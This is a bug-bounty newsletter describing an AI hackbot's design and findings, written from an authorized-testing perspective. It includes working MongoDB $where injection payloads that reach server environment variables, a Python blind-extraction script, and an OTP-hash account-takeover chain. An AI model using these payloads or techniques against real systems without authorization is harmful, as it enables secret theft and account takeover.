[HackerNotes Ep. 181] Inside Singularity, the Hackbot of xssdoctor and Rez0

We dig deep into some features of Singularity, the hackbot Rez0 and xssdoctor built.

Hacker TL;DR

  • A wide-scope hackbot pulled 60 to 80 solid bugs in six months, including a blind MongoDB $where injection that turned into env exfil, a bug class most of us gave up on years ago.

  • Chain more LLMs, not fewer. Dropping a boss/overseer in the middle plus an escalation agent and a validator made the output go up, not down.

  • Auth is still the wall. Around 80% of tokens were getting burned on login and captcha loops until they actually measured it.

  • AI gives you scale, not spidey sense. Offload the grind and the "dead" bug classes to the bot, keep the lead-to-finding judgment for yourself.

Today's Sponsor: Check out Zero Trust Cloud Access from ThreatLocker https://www.criticalthinkingpodcast.io/tl-ztca

Who's JD

JD, aka xssdoctor, is a cardiologist who hacks on the side. Listeners already know him from the pod and from everything he has produced for the community, like the Hackalongs on our Discord. He spent last year going deep on client-side, window references, postMessage, the whole browser-side skill tree, and he is now pushing into server-side and hardware. Singularity is the wide-scope hackbot he and Rez0 built together starting back in January, right after the new Opus model dropped.

Blind NoSQL Injection to Env Exfil

It is a great example of the bot finding something a human would have walked past.

The target looked like a plain GraphQL API. Nested inside the query was a JSON-shaped parameter, and the bot noticed the backend was actually MongoDB evaluating server-side JavaScript. That is the $where door. The key in the object is $where, the value is a string that gets evaluated server-side as JS.

First you confirm it with a trivial truth oracle:

{ "$where": "1 == 1" }

If the response differs between a true condition like 1 == 1 and a false one like 1 == 2, your string is being evaluated as JavaScript on the backend. From there you escape to the Function constructor and reach into the process:

{ "$where": "this.constructor.constructor('return globalThis.process')().env.NODE_ENV[0] === 'd'" }

No data comes back directly, so it is fully blind. The response only tells you true or false, which means you binary-search every character of every value you want. Claude wrote the extraction script itself and pulled the environment variables out character by character, including the access token sitting in env. The report also folded in a prototype pollution angle, which is exactly the kind of detail that makes a bug fun instead of just a payout.
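
To make the true/false loop concrete, here is a minimal Python sketch of that kind of extraction. It is not the script Claude wrote, which we do not have. The oracle callback, the helper names, the charCodeAt comparison, and the ASCII-only assumption are all ours, and the demo oracle is a local fake, not a real target.

```python
import json
from typing import Callable

# Hypothetical oracle: given a character index and a threshold, return True
# when the target's response says "char code at index > threshold".
Oracle = Callable[[int, int], bool]


def build_payload(var_name: str, index: int, threshold: int) -> str:
    """Build a $where document asking one yes/no question about one character.

    The expression shape extends the payload shown above; using charCodeAt
    with a greater-than comparison is our assumption.
    """
    expr = (
        "this.constructor.constructor('return globalThis.process')()"
        f".env[{json.dumps(var_name)}].charCodeAt({index}) > {threshold}"
    )
    return json.dumps({"$where": expr})


def extract_value(oracle: Oracle, max_len: int = 64) -> str:
    """Recover a string one character at a time with binary search (ASCII only)."""
    chars = []
    for index in range(max_len):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(index, mid):
                lo = mid + 1  # char code is above mid
            else:
                hi = mid      # char code is mid or below
        if lo == 0:
            # Past the end of the string every comparison is false
            # (charCodeAt yields NaN in JS), so the search bottoms out at 0.
            break
        chars.append(chr(lo))
    return "".join(chars)


def make_fake_oracle(secret: str):
    """Local stand-in for the target so the sketch runs without a network."""
    calls = {"n": 0}

    def oracle(index: int, threshold: int) -> bool:
        calls["n"] += 1
        if index >= len(secret):
            return False
        return ord(secret[index]) > threshold

    return oracle, calls
```

Against a 7-bit alphabet each character costs seven requests, so an 11-character value like development comes back in under a hundred. In a real run the oracle would send build_payload(...) through the vulnerable parameter and map the response to True or False.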

It was triaged as a critical in about ten minutes.

The interesting part is not just the payload, it is the meta. This is straight out of the PortSwigger NoSQL module. JD used to look for it manually on every Mongo target, never found it, and eventually filed it under "dead, nobody runs backend JS anymore." The bot never filed it under anything. It just kept checking, on every host, forever, and on this one it paid off. That is the whole pitch for scale: bugs that live on one in ten thousand hosts are not worth a human checking for, and are trivial for a bot to check everywhere.

Google OTP Hash Leak

Second one, found basically manually by the bot on a lower-severity Google service. When you requested an OTP, the response handed back a bcrypt hash of that OTP. Crackable on rentable hardware in roughly two hours. So the chain is: trigger a password reset, grab the hash from the response, crack it offline, use the OTP, take over the account. Clean account takeover off a single leaked hash in a response body.
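
The reason a hash does not protect an OTP is the tiny keyspace. The arithmetic below is a back-of-the-envelope sketch: the six-digit OTP length and the guess rate are assumptions for illustration, not numbers from the episode.

```python
def worst_case_hours(otp_digits: int, guesses_per_second: float) -> float:
    """Hours needed to try every numeric OTP of the given length offline."""
    keyspace = 10 ** otp_digits  # e.g. 000000 through 999999 for six digits
    return keyspace / guesses_per_second / 3600
```

With those assumed numbers, worst_case_hours(6, 139) comes out at about two hours, so a crack time like the one quoted would only need a modest bcrypt guess rate. At the same rate an eight-digit code would take roughly 200 hours, which is why the length of the code matters more than the choice of hash.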

Singularity Has Three Moving Parts

If you want to build one of these, this is the mental model they landed on. There are three distinct problems and they each caused pain at different points over the six months.

  1. The thing that hacks. The worker, the hunter. This is the agent actually touching the target.

  2. The thing that tells it to hack. The boss, the orchestrator. It picks scope, kicks off workers, tells them to go back and dig harder, decides when to scale up and when you are about to run out of tokens.

  3. The thing you interact with. For Singularity that is a custom Discord. Findings drop as PDFs in one channel, reports as markdown in another, and on a busy day you are looking at around 50 alerts.
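
As a rough mental model in code, the three parts can be sketched as plain Python callables. Every name here (Finding, Orchestrator, cost_per_run, the flat per-run token cost) is hypothetical; Singularity's real internals were not described at this level.

```python
from dataclasses import dataclass
from typing import Callable, List


@dataclass
class Finding:
    target: str
    summary: str


# Part 1, the worker: anything that takes a target and returns findings.
Worker = Callable[[str], List[Finding]]
# Part 3, the interface: anything that can put a finding in front of a human.
Notifier = Callable[[Finding], None]


@dataclass
class Orchestrator:
    """Part 2, the boss: picks targets, runs workers, watches the budget."""

    worker: Worker
    notify: Notifier
    token_budget: int
    cost_per_run: int  # assumed flat cost per worker run, for simplicity

    def run(self, scope: List[str]) -> int:
        runs = 0
        for target in scope:
            if self.token_budget < self.cost_per_run:
                break  # about to run out of tokens, stop scheduling
            self.token_budget -= self.cost_per_run
            for finding in self.worker(target):
                self.notify(finding)
            runs += 1
        return runs
```

Keeping the interface as a bare callback means the same orchestrator could post to a Discord channel, a file, or a test list without changes.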

One detail worth stealing: live log injection. You can click into a running worker's log and type straight into the bot mid-run to nudge it. JD uses it constantly when he has nothing else to do, and it is how a lot of the tuning happened.
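
One simple way to get that kind of mid-run nudge is a queue the worker drains between steps. This is a sketch of the idea only; run_worker and the log format are made up, and the real implementation was not described.

```python
import queue
from typing import List


def run_worker(steps: List[str], nudges: "queue.Queue[str]") -> List[str]:
    """Run steps in order, folding in operator hints typed since the last step."""
    log = []
    for step in steps:
        # Drain everything the operator has typed without blocking the run.
        while True:
            try:
                hint = nudges.get_nowait()
            except queue.Empty:
                break
            log.append(f"operator: {hint}")
        log.append(f"worker: {step}")
    return log
```

In an agent loop the drained hints would be appended to the model's context before the next step, so the operator steers the run without restarting it.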

The 80% Auth Tax

Early on the token bill was getting torched in about two days with barely any findings to show for it. So they actually instrumented it and pulled the metrics. The bot was spending roughly 80% of its tokens on authentication and only 20% on hacking. It was trying to log in over and over, multiple ways, and burning whole runs on "let's try to solve this captcha a hundred million times."

The lesson is blunt: if you are not measuring where your tokens go, you are probably paying to watch an agent fight a login form. Measure first.
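
Measuring can be as small as tagging every model call with a category and summing. A minimal sketch, assuming you can read a token count off each call; TokenLedger and the category names are hypothetical.

```python
from collections import Counter
from typing import Dict


class TokenLedger:
    """Accumulate token usage per activity and report each activity's share."""

    def __init__(self) -> None:
        self.by_category: Counter = Counter()

    def record(self, category: str, tokens: int) -> None:
        self.by_category[category] += tokens

    def shares(self) -> Dict[str, float]:
        total = sum(self.by_category.values())
        if total == 0:
            return {}
        return {cat: used / total for cat, used in self.by_category.items()}
```

If shares() ever shows something like 0.8 for auth, you have found your problem before the bill does.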

More LLMs, Not Fewer

The original design had hard-coded phases: recon, then hack, then review and chain. That got ripped out. Instead there is an actual boss/overseer LLM sitting between the operators and the worker, and instead of a dumb "you're doing great, keep going" loop, it says "no, you missed this and this, go back and do that."

Counterintuitively, adding LLMs into the chain made things sharper, not noisier. Two pieces carry a lot of the weight here:

  • Escalation agent. Before a finding ever reaches validation, this agent tries to escalate it. Low to medium, medium to high, medium to critical. There are escalation logs and it genuinely moves severity up when the impact is there.

  • Validator agent. It takes the finding, sometimes already escalated, and is told to reproduce it skeptically, like a triager who wants to reject it. The worker gets excited and wants to find a bug. The validator wants to invalidate it. That tension is the point, and it is rare for the validator to be wrong. If it checks out, it writes the report with the full reporting skill attached.
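
The escalate-then-validate flow can be sketched as a small pipeline. The two agents are stubbed as plain callables here, and the names plus the rule that escalation never lowers severity are our assumptions, not details from the episode.

```python
from dataclasses import dataclass, replace
from typing import Callable, Optional

SEVERITIES = ["low", "medium", "high", "critical"]


@dataclass(frozen=True)
class Finding:
    title: str
    severity: str
    reproduced: bool = False


def process(
    finding: Finding,
    escalate: Callable[[Finding], Finding],
    validate: Callable[[Finding], bool],
) -> Optional[Finding]:
    """Escalate first, then let a skeptical validator try to kill the finding."""
    escalated = escalate(finding)
    # Assumed guard: an escalation attempt may raise severity but never lower it.
    if SEVERITIES.index(escalated.severity) < SEVERITIES.index(finding.severity):
        escalated = finding
    if not validate(escalated):
        return None  # the validator could not reproduce it, so no report
    return replace(escalated, reproduced=True)
```

The useful property is that the worker and the validator have opposite incentives, and only findings that survive both reach the report stage.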

Output roughly tripled after the middle LLM went in. At minimum it broke the plateau the bot had stalled on.

Hail Mary Mode

This one is exactly what it sounds like. You point it at a target and tell it to go until it finds something. If it cannot find a bug in the app, go after the libraries and dependencies. If not there, go after the protocol itself. The orchestrator spins up a dedicated fuzzing agent that does weird mutations, hands back a fuzzing list, the orchestrator reasons over it and says "go hit this endpoint," and builds the whole work order from there.
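
The fallback order reads naturally as a loop over layers. A minimal sketch, assuming a hunt callback that returns a description of a bug or None; the layer names, the callback, and the max_rounds cap are all hypothetical (the cap is only there so the sketch terminates).

```python
from typing import Callable, Optional, Tuple

# Order taken from the description above: app first, then what it is built on.
LAYERS = ["application", "dependencies", "protocol"]


def hail_mary(
    target: str,
    hunt: Callable[[str, str], Optional[str]],
    max_rounds: int = 3,
) -> Optional[Tuple[str, str]]:
    """Walk down the layers, round after round, until something turns up."""
    for _ in range(max_rounds):
        for layer in LAYERS:
            result = hunt(target, layer)
            if result is not None:
                return layer, result
    return None
```

In the real system the hunt step is where the fuzzing agent and the orchestrator's reasoning over its output would plug in.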

It is underused and it hits almost every time it runs. There is a lot of meat left on that bone.

Auth Is Still the Wall

Quick disambiguation, because "auth" means two things in this world. There is agent auth (how you authenticate to Claude or Codex) and there is target auth (logging the bot into the program). The second one is the holy grail, and nobody has fully cracked it.

The problems stack up fast:

  • Headless terminals limit how the agent talks to real sites, and big targets gate everything behind captchas that Playwright does not beat reliably, no matter what the captcha-solver vendors promise. Think about it from the defender's side: Amazon's captcha is not there to stop hackers, it is there to stop scraping, and they have a whole team whose job is to keep you out.

  • Headed browsers work but cost you a real machine with a screen, which then restarts, updates, and drifts on you.

  • Token refresh logic breaks silently. A target refreshes auth every fifteen minutes, logging in elsewhere invalidates the refresh, and three weeks later you realize the keep-alive has been dead the whole time. No wonder there were no bugs on that program.
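
The silent-failure case is cheap to guard against: track when the last refresh actually succeeded and complain once that is too old. A sketch under our own assumptions; SessionWatchdog and its refresh callback are hypothetical, and the 900-second window in the usage note below simply mirrors the fifteen-minute refresh mentioned above.

```python
import time
from typing import Callable, Optional


class SessionWatchdog:
    """Report a session as unhealthy once refreshes have failed for too long."""

    def __init__(
        self,
        refresh: Callable[[], bool],  # returns True when the refresh worked
        max_age_seconds: float,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self._refresh = refresh
        self._max_age = max_age_seconds
        self._clock = clock
        self._last_ok: Optional[float] = None

    def tick(self) -> bool:
        """Attempt one refresh and return the current health."""
        if self._refresh():
            self._last_ok = self._clock()
        return self.healthy()

    def healthy(self) -> bool:
        if self._last_ok is None:
            return False
        return self._clock() - self._last_ok <= self._max_age
```

Constructed with max_age_seconds=900 and wired to an alert channel, a False from tick() turns "three weeks later you realize" into a ping within minutes.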

The reason this matters so much: the authenticated realm is where the bugs live. There are pure automators who beat all of us at unauthenticated bugs without AI. The edge is in the logged-in surface, and that is precisely the surface auth problems keep you out of. The deep, single-target hackbot from the recent Google episode did so well in part because it took auth out of the equation and stayed unauthenticated, which is genius, but it is the exception.

The Boredom of Being a Bug Hunter Now

Worth saying out loud because it came up hard in this episode. Watching a fake intelligence find bugs you would never have found does something to the motivation. Popping a critical used to be rare and you would be proud of it. Now criticals and highs roll in constantly, from you and from your agents, and each one lands a little softer. Finding a medium by hand can genuinely feel better than the bot popping a critical.

The counterweight is that AI is also the best way to learn a new skill fast. Reproducing the bugs the bot finds is how JD is getting better at server-side, a whole area he used to write off as not real. And learning a brand new thing, hardware in his case, with AI as the study guide, brought the passion right back.

Two framings to leave you with. One, the watchmaker analogy from Hakluke's post: quartz killed the watchmakers who refused to adapt and made the ones who pivoted thrive. The hunters who use AI to go deeper and wider will be fine; the ones who do not will struggle. Two, the rule that keeps coming up: whatever AI does, it does it better when you are already good at the thing. Getting good at things using AI makes your AI better. So do not stop learning the actual craft just because the bot can do it.

That's it for the week, keep hacking!